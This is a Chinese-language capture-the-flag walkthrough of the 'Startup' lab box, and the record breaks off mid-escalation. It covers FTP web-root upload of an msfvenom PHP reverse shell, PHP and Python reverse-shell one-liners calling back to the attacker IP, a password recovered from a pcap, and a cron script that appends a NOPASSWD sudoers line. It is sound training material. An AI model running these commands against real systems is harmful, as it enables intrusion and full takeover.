Startup

Abuse traditional vulnerabilities via untraditional means.

Tag: wireshark, cron, gobuster, enumeration

Kali Linux : 10.18.72.222

Target IP Address : 10.10.40.155

Task 1: Welcome to Spice Hut!

We are Spice Hut, a new startup company that just made it big! We offer a variety of spices and club sandwiches (in case you get hungry), but that is not why you are here. To be truthful, we aren’t sure if our developers know what they are doing and our security concerns are rising. We ask that you perform a thorough penetration test and try to own root. Good luck!

┌──(root㉿kali)-[~]
└─# nmap 10.10.40.155                
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-03 02:37 EDT
Nmap scan report for 10.10.40.155
Host is up (0.26s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 36.57 seconds

┌──(root㉿kali)-[~]
└─# nmap -sV -p 21,22,80 -sC 10.10.40.155       
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-03 02:38 EDT
Nmap scan report for 10.10.40.155
Host is up (0.26s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.18.72.222
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp [NSE: writeable]
| -rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
|_-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA)
|   256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA)
|_  256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Maintenance
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.46 seconds

ftp允许匿名登录

┌──(root㉿kali)-[~]
└─# ftp 10.10.40.155
Connected to 10.10.40.155.
220 (vsFTPd 3.0.3)
Name (10.10.40.155:root): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||60659|)
150 Here comes the directory listing.
drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp
-rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
226 Directory send OK.
ftp> lpwd
Local directory: /root
ftp> lcd /root/Downloads
Local directory now: /root/Downloads
ftp> lpwd
Local directory: /root/Downloads
ftp> get important.jpg
local: important.jpg remote: important.jpg
229 Entering Extended Passive Mode (|||10669|)
150 Opening BINARY mode data connection for important.jpg (251631 bytes).
100% |****************************************************************************************************************|   245 KiB   22.24 KiB/s    00:00 ETA
226 Transfer complete.
251631 bytes received in 00:11 (21.72 KiB/s)
ftp> get notice.txt
local: notice.txt remote: notice.txt
229 Entering Extended Passive Mode (|||9547|)
150 Opening BINARY mode data connection for notice.txt (208 bytes).
100% |****************************************************************************************************************|   208        0.23 KiB/s    00:00 ETA
226 Transfer complete.
208 bytes received in 00:01 (0.18 KiB/s)
ftp> cd ftp
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||16645|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> pwd
Remote directory: /ftp
ftp> 

notice.txt

Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.

可能的用户名：Maya

访问Web应用程序：http://10.10.40.155/

点击contact us: 有个mailto:#，可以选择用其他应用程序打开。

用dirbuster寻找隐藏目录，使用字典：/usr/share/dirbuster/wordlists/

/
/files/
/icons/
/files/ftp/
/files/notice.txt

DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Thu Aug 03 03:08:43 EDT 2023
--------------------------------

http://10.10.40.155:80
--------------------------------
Directories found during testing:

Dirs found with a 200 response:

/
/files/
/files/ftp/

Dirs found with a 403 response:

/icons/


--------------------------------
Files found during testing:

Files found with a 200 responce:

/files/notice.txt


--------------------------------

访问http://10.10.40.155/files/，发现列出的目录内容和ftp匿名登录服务器列出的目录内容一样。说明ftp服务器的工作目录与Web目录相同，我们可以通过ftp服务器上传Webshell，然后在该页面执行。

Index of /files
[ICO]	Name	Last modified	Size	Description
[PARENTDIR]	Parent Directory	 	- 	 
[DIR]	ftp/	2020-11-12 04:53 	- 	 
[IMG]	important.jpg	2020-11-12 04:02 	246K	 
[TXT]	notice.txt	2020-11-12 04:53 	208 	 
Apache/2.4.18 (Ubuntu) Server at 10.10.40.155 Port 80

MSFVenom Cheatsheet

利用msfvenom生成一个PHP Webshell。

┌──(root㉿kali)-[~/Downloads]
└─# msfvenom -p php/reverse_php LHOST=10.18.72.222 LPORT=4433 -f raw > phpreverseshell.php        
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 2983 bytes

将生成的phpreverseshell.php通过ftp上传到Web服务器的ftp目录，并执行。

┌──(root㉿kali)-[~/Downloads]
└─# ftp 10.10.40.155  
Connected to 10.10.40.155.
220 (vsFTPd 3.0.3)
Name (10.10.40.155:root): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> lpwd
Local directory: /root/Downloads
ftp> put phpreverseshell.php
local: phpreverseshell.php remote: phpreverseshell.php
229 Entering Extended Passive Mode (|||42331|)
553 Could not create file.
ftp> ls
229 Entering Extended Passive Mode (|||17270|)
150 Here comes the directory listing.
drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp
-rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
226 Directory send OK.
ftp> cd ftp
250 Directory successfully changed.
ftp> pwd
Remote directory: /ftp
ftp> put phpreverseshell.php
local: phpreverseshell.php remote: phpreverseshell.php
229 Entering Extended Passive Mode (|||9167|)
150 Ok to send data.
100% |****************************************************************************************************************|  2983        8.94 MiB/s    00:00 ETA
226 Transfer complete.
2983 bytes sent in 00:00 (5.57 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||8300|)
150 Here comes the directory listing.
-rwxrwxr-x    1 112      118          2983 Aug 03 07:22 phpreverseshell.php
226 Directory send OK.

┌──(root㉿kali)-[~]
└─# msfconsole -q 
[*] Starting persistent handler(s)...
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/reverse_php):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LHOST 10.18.72.222
LHOST => 10.18.72.222
msf6 exploit(multi/handler) > set LPORT 4433
LPORT => 4433
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.18.72.222:4433 

访问http://10.10.40.155/files/ftp/，点击刚才上传的phpreverseshell.php。成功获得Command shell session。

因为Command shell session非常不稳定，所以需要获取PHP Reverse Shell。

┌──(root㉿kali)-[~]
└─# nc -nvlp 1234
listening on [any] 1234 ...

php -r '$sock=fsockopen("10.18.72.222",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.18.72.222:4433 
[*] Command shell session 4 opened (10.18.72.222:4433 -> 10.10.40.155:49900) at 2023-08-03 04:12:17 -0400


id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
php -r '$sock=fsockopen("10.18.72.222",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

┌──(root㉿kali)-[~]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.18.72.222] from (UNKNOWN) [10.10.40.155] 50532
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
ftp:x:112:118:ftp daemon,,,:/srv/ftp:/bin/false
lennie:x:1002:1002::/home/lennie:
ftpsecure:x:1003:1003::/home/ftpsecure:

发现用户：root、vagrant、lennie

$ cd /home
$ ls
lennie
$ cd lennie
/bin/sh: 9: cd: can't cd to lennie
$ ls -al
total 12
drwxr-xr-x  3 root   root   4096 Nov 12  2020 .
drwxr-xr-x 25 root   root   4096 Aug  3 06:36 ..
drwx------  4 lennie lennie 4096 Nov 12  2020 lennie

$ cd /
$ pwd
/
$ cat recipe.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.

在/incidents目录下发现suspicious.pcapng。

$ cd incidents
$ ls
suspicious.pcapng
$ pwd   
/incidents
$ ls -al
total 40
drwxr-xr-x  2 www-data www-data  4096 Nov 12  2020 .
drwxr-xr-x 25 root     root      4096 Aug  3 06:36 ..
-rwxr-xr-x  1 www-data www-data 31224 Nov 12  2020 suspicious.pcapng

将suspicious.pcapng复制到ftp服务器的目录中，然后下载。

$ cd /var/www
$ ls
ls: cannot open directory '.': Permission denied
$ pwd
/var/www
$ cd html
$ ls
files
index.html
$ cd files
$ pwd
/var/www/html/files
$ ls
ftp
important.jpg
notice.txt
$ cd ftp
$ pwd
/var/www/html/files/ftp
$ cp /incidents/suspicious.pcapng .

ftp> pwd
Remote directory: /
ftp> ls
229 Entering Extended Passive Mode (|||54443|)
150 Here comes the directory listing.
drwxrwxrwx    2 65534    65534        4096 Aug 03 08:27 ftp
-rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
226 Directory send OK.
ftp> cd ftp
250 Directory successfully changed.
ftp> pwd
Remote directory: /ftp
ftp> ls
229 Entering Extended Passive Mode (|||38429|)
150 Here comes the directory listing.
-rwxrwxr-x    1 112      118            87 Aug 03 07:56 oneliner.php
-rwxrwxr-x    1 112      118          2983 Aug 03 07:22 phpreverseshell.php
-rwxrwxr-x    1 112      118           207 Aug 03 08:00 shell.elf
-rwxr-xr-x    1 33       33          31224 Aug 03 08:27 suspicious.pcapng
226 Directory send OK.
ftp> lpwd
Local directory: /root/Downloads
ftp> get suspicious.pcapng
local: suspicious.pcapng remote: suspicious.pcapng
229 Entering Extended Passive Mode (|||65472|)
150 Opening BINARY mode data connection for suspicious.pcapng (31224 bytes).
100% |****************************************************************************************************************| 31224      435.15 KiB/s    00:00 ETA
226 Transfer complete.
31224 bytes received in 00:00 (88.53 KiB/s)

分析suspicious.pcapng的内容，Follow HTTP Stream。

tcp.stream eq 2

HTTP/1.1 200 OK
Date: Fri, 02 Oct 2020 17:39:24 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 155
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

WARNING: Failed to daemonise.  This is quite common and not fatal.
Successfully opened reverse shell to 192.168.22.139:4444
ERROR: Shell connection terminated
 
GET /favicon.ico HTTP/1.1
Host: 192.168.33.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive

HTTP/1.1 404 Not Found
Date: Fri, 02 Oct 2020 17:40:16 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 275
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.33.10 Port 80</address>
</body></html>
GET /files/ftp/shell.php HTTP/1.1
Host: 192.168.33.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

HTTP/1.1 200 OK
Date: Fri, 02 Oct 2020 17:40:21 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 152
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

WARNING: Failed to daemonise.  This is quite common and not fatal.
Successfully opened reverse shell to 192.168.22.139:4444
ERROR: Shell process terminated

上面的日志是HTTP请求和响应之间在一个服务器（运行在Ubuntu上的Apache/2.4.18）和一个客户端（用户代理）之间的交互记录，该服务器的IP地址是192.168.33.10。这个日志显示了客户端试图访问服务器上特定资源的过程。

解析日志：

第一个请求/响应：
- 客户端发出HTTP GET请求，访问根路径(“/”)，试图获取默认页面。
- 服务器以”200 OK”状态码做出响应，并返回了一个压缩的HTML内容，长度为155字节。
- 接着，出现了一个WARNING警告，指示daemonise过程失败，但不是致命的。
- 然后，它显示成功打开了一个反向shell到IP地址192.168.22.139的端口4444。
- 最后，一个ERROR消息表明shell连接已终止。
第二个请求/响应：
- 客户端发出另一个HTTP GET请求，这次是为了获取”/favicon.ico”这个资源，这是在浏览器标签中显示的图标。
- 服务器返回”404 Not Found”状态码，表示请求的资源在服务器上未找到。
- 服务器提供一个HTML页面，解释了错误和服务器的详细信息。
第三个请求/响应：
- 客户端发出另一个HTTP GET请求，这次是为了获取资源”/files/ftp/shell.php”。
- 服务器以”200 OK”状态码做出响应，并返回了一个压缩的HTML内容，长度为152字节。
- 和之前一样，又出现了一个WARNING警告，指示daemonise过程失败，但不是致命的。
- 服务器表示成功地打开了一个反向shell到IP地址192.168.22.139的端口4444。
- 同样，一个ERROR消息表明shell连接已终止。

从日志中可以看出，有一个尝试在服务器上访问特定资源”shell.php”的行为，并且服务器返回了包含与反向shell相关的WARNING和ERROR消息的压缩HTML内容。值得注意的是，这样的活动可能表明未经授权的访问或潜在的安全漏洞。如果您是服务器管理员，有必要进一步调查这个问题，以确保服务器的安全和完整性。

服务器响应的内容为：

警告：无法将进程变为守护进程。这是相当常见的问题，但不会导致致命错误。成功打开反向shell到192.168.22.139:4444。错误：Shell进程已终止。

服了，我竟然没有耐心地看完所有TCP流，忽略了下面最重要的信息：

tcp.stream eq 7

Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 17:40:21 up 20 min,  1 user,  load average: 0.00, 0.03, 0.12
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
vagrant  pts/0    10.0.2.2         17:21    1:09   0.54s  0.54s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls
bin
boot
data
dev
etc
home
incidents
initrd.img
initrd.img.old
lib
lib64
lost+found
media
mnt
opt
proc
recipe.txt
root
run
sbin
snap
srv
sys
tmp
usr
vagrant
var
vmlinuz
vmlinuz.old
$ ls -la
total 96
drwxr-xr-x  26 root     root      4096 Oct  2 17:24 .
drwxr-xr-x  26 root     root      4096 Oct  2 17:24 ..
drwxr-xr-x   2 root     root      4096 Sep 25 08:12 bin
drwxr-xr-x   3 root     root      4096 Sep 25 08:12 boot
drwxr-xr-x   1 vagrant  vagrant    140 Oct  2 17:24 data
drwxr-xr-x  16 root     root      3620 Oct  2 17:20 dev
drwxr-xr-x  95 root     root      4096 Oct  2 17:24 etc
drwxr-xr-x   4 root     root      4096 Oct  2 17:26 home
drwxr-xr-x   2 www-data www-data  4096 Oct  2 17:24 incidents
lrwxrwxrwx   1 root     root        33 Sep 25 08:12 initrd.img -> boot/initrd.img-4.4.0-190-generic
lrwxrwxrwx   1 root     root        33 Sep 25 08:12 initrd.img.old -> boot/initrd.img-4.4.0-190-generic
drwxr-xr-x  22 root     root      4096 Sep 25 08:22 lib
drwxr-xr-x   2 root     root      4096 Sep 25 08:10 lib64
drwx------   2 root     root     16384 Sep 25 08:12 lost+found
drwxr-xr-x   2 root     root      4096 Sep 25 08:09 media
drwxr-xr-x   2 root     root      4096 Sep 25 08:09 mnt
drwxr-xr-x   2 root     root      4096 Sep 25 08:09 opt
dr-xr-xr-x 125 root     root         0 Oct  2 17:19 proc
-rw-r--r--   1 www-data www-data   136 Oct  2 17:24 recipe.txt
drwx------   3 root     root      4096 Oct  2 17:24 root
drwxr-xr-x  25 root     root       960 Oct  2 17:23 run
drwxr-xr-x   2 root     root      4096 Sep 25 08:22 sbin
drwxr-xr-x   2 root     root      4096 Oct  2 17:20 snap
drwxr-xr-x   3 root     root      4096 Oct  2 17:23 srv
dr-xr-xr-x  13 root     root         0 Oct  2 17:19 sys
drwxrwxrwt   7 root     root      4096 Oct  2 17:40 tmp
drwxr-xr-x  10 root     root      4096 Sep 25 08:09 usr
drwxr-xr-x   1 vagrant  vagrant    118 Oct  1 19:49 vagrant
drwxr-xr-x  14 root     root      4096 Oct  2 17:23 var
lrwxrwxrwx   1 root     root        30 Sep 25 08:12 vmlinuz -> boot/vmlinuz-4.4.0-190-generic
lrwxrwxrwx   1 root     root        30 Sep 25 08:12 vmlinuz.old -> boot/vmlinuz-4.4.0-190-generic
$ whoami
www-data
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@startup:/$ cd
cd
bash: cd: HOME not set
www-data@startup:/$ ls
ls
bin   etc	  initrd.img.old  media  recipe.txt  snap  usr	    vmlinuz.old
boot  home	  lib		  mnt	 root	     srv   vagrant
data  incidents   lib64		  opt	 run	     sys   var
dev   initrd.img  lost+found	  proc	 sbin	     tmp   vmlinuz
www-data@startup:/$ cd home
cd home
www-data@startup:/home$ cd lennie
cd lennie
bash: cd: lennie: Permission denied
www-data@startup:/home$ ls
ls
lennie
www-data@startup:/home$ cd lennie
cd lennie
bash: cd: lennie: Permission denied
www-data@startup:/home$ sudo -l
sudo -l
[sudo] password for www-data: c4ntg3t3n0ughsp1c3

Sorry, try again.
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: c4ntg3t3n0ughsp1c3

sudo: 3 incorrect password attempts
www-data@startup:/home$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
ftp:x:112:118:ftp daemon,,,:/srv/ftp:/bin/false
lennie:x:1002:1002::/home/lennie:
ftpsecure:x:1003:1003::/home/ftpsecure:
www-data@startup:/home$ exit
exit
exit
$ exit

这里我们尝试使用密码：c4ntg3t3n0ughsp1c3

www-data@startup:/home$ sudo -l
sudo -l
[sudo] password for www-data: c4ntg3t3n0ughsp1c3

Sorry, try again.
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: c4ntg3t3n0ughsp1c3

sudo: 3 incorrect password attempts

sudo -l是一个用于查看当前用户在sudo配置中具有的权限的命令。

解释：

sudo: 是用于以超级用户（root）权限运行命令的工具。它允许授权用户以临时的管理员身份执行特定的命令，以便完成需要特权权限的任务。
-l: 这是sudo命令的一个选项，表示”list”，用于列出当前用户的sudo权限。

当你在终端中执行sudo -l命令时，它会要求你输入当前用户的密码（如果当前用户有sudo权限的话）。然后，它会显示当前用户在sudo配置中被允许执行的命令和权限列表。这样，你可以了解到你有哪些特权，以及在什么情况下可以以管理员身份执行命令。

请注意，使用sudo命令要谨慎，并确保只授予合理的权限给用户，以避免安全风险。在配置sudo权限时，应该限制用户只能执行必要的特权操作，并避免赋予不必要的权限。

因为无法执行su命令，只能尝试重新用Python spwan a shell。

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.18.72.222",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.18.72.222:4433 
[*] Command shell session 8 opened (10.18.72.222:4433 -> 10.10.40.155:49924) at 2023-08-03 07:06:48 -0400

python -V

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.18.72.222",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

果然，Python spwan的Shell才可以进行交互！！

┌──(root㉿kali)-[~]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.18.72.222] from (UNKNOWN) [10.10.40.155] 50556
www-data@startup:/var/www/html/files/ftp$ whoami
whoami
www-data
www-data@startup:/var/www/html/files/ftp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@startup:/var/www/html/files/ftp$ cd /home
cd /home
www-data@startup:/home$ ls -al
ls -al
total 12
drwxr-xr-x  3 root   root   4096 Nov 12  2020 .
drwxr-xr-x 25 root   root   4096 Aug  3 06:36 ..
drwx------  4 lennie lennie 4096 Nov 12  2020 lennie
www-data@startup:/home$ cd lennie
cd lennie
bash: cd: lennie: Permission denied

www-data@startup:/vagrant$ sudo -l
sudo -l
sudo: unable to resolve host startup
[sudo] password for www-data: c4ntg3t3n0ughsp1c3

Sorry, try again.
[sudo] password for www-data: c4ntg3t3n0ughsp1c3

Sorry, try again.
[sudo] password for www-data: c4ntg3t3n0ughsp1c3

sudo: 3 incorrect password attempts

www-data@startup:/vagrant$ su lennie
su lennie
Password: c4ntg3t3n0ughsp1c3

lennie@startup:/vagrant$ whoami
whoami
lennie
lennie@startup:/vagrant$ id
id
uid=1002(lennie) gid=1002(lennie) groups=1002(lennie)
lennie@startup:/vagrant$ cd ~
cd ~
lennie@startup:~$ pwd
pwd
/home/lennie
lennie@startup:~$ ls
ls
Documents  scripts  user.txt
lennie@startup:~$ ls -al      
ls -al
total 20
drwx------ 4 lennie lennie 4096 Nov 12  2020 .
drwxr-xr-x 3 root   root   4096 Nov 12  2020 ..
drwxr-xr-x 2 lennie lennie 4096 Nov 12  2020 Documents
drwxr-xr-x 2 root   root   4096 Nov 12  2020 scripts
-rw-r--r-- 1 lennie lennie   38 Nov 12  2020 user.txt
lennie@startup:~$ cat user.txt
cat user.txt
THM{03ce3d619b80ccbfb3b7fc81e46c0e79}

这里的思路很明确，planner.sh是root用户的Cron Job，lennie不能修改该文件。但是，查看planner.sh文件的内容，发现其中执行了/etc/print.sh脚本，/etc/print.sh脚本属于lennie，lennie可以修改/etc/print.sh。所以，将/etc/print.sh的内容修改为如下，意味将sudo 命令的权限设置为：用户 lennie 可以在所有主机上以任何用户的身份（即不需要密码）执行任何命令。

#!/bin/bash
echo "lennie ALL=NOPASSWD:ALL" >> /etc/sudoers

该脚本是一个 Bash 脚本，用于将一条文本追加到 /etc/sudoers 文件中。/etc/sudoers 文件是 Linux 系统中用于配置 sudo 命令的权限的重要文件。它规定了哪些用户可以以超级用户（root）的身份执行命令，以及是否需要输入密码。

让我们逐行解释该脚本的内容：

#!/bin/bash：这是一个 shebang（也称为 hashbang），用于指定脚本使用的解释器。在这里，它指定使用 Bash 解释器来执行该脚本。
echo "lennie ALL=NOPASSWD:ALL" >> /etc/sudoers：这是一个 echo 命令，它会输出文本内容并将其追加到 /etc/sudoers 文件中。在这里，它将字符串 "lennie ALL=NOPASSWD:ALL" 追加到 /etc/sudoers 文件的末尾。

解释字符串 "lennie ALL=NOPASSWD:ALL" 的含义：

lennie：这是一个用户名，表示用户 lennie。
ALL：这是一个主机名，表示所有主机。它指定该权限规则适用于所有主机。
NOPASSWD：这是一个关键字，表示用户在执行 sudo 命令时不需要输入密码。
ALL：这是一个命令名，表示所有命令。它指定该权限规则适用于所有命令。

因此，这条规则的含义是：用户 lennie 可以在所有主机上以任何用户的身份（即不需要密码）执行任何命令。请注意，修改 /etc/sudoers 文件是一个敏感的操作，因为错误的修改可能导致系统不稳定或不安全。在实际情况中，修改 /etc/sudoers 应该谨慎进行，并遵循正确的权限配置和备份策略。

这个sudo感觉很有礼貌？不像是系统原装的sudo。

lennie@startup:~/scripts$ sudo -l
sudo -l
sudo: unable to resolve host startup
[sudo] password for lennie: c4ntg3t3n0ughsp1c3

Sorry, user lennie may not run sudo on startup.

lennie@startup:~/scripts$ sudo cat /etc/shadow
sudo cat /etc/shadow
sudo: unable to resolve host startup
[sudo] password for lennie: c4ntg3t3n0ughsp1c3

lennie is not in the sudoers file.  This incident will be reported.

这也提示了我们应该修改sudoer文件。

lennie@startup:~$ cd scripts
cd scripts
lennie@startup:~/scripts$ ls -al
ls -al
total 16
drwxr-xr-x 2 root   root   4096 Nov 12  2020 .
drwx------ 4 lennie lennie 4096 Nov 12  2020 ..
-rwxr-xr-x 1 root   root     77 Nov 12  2020 planner.sh
-rw-r--r-- 1 root   root      1 Aug  3 15:50 startup_list.txt
lennie@startup:~/scripts$ cat planner.sh
cat planner.sh
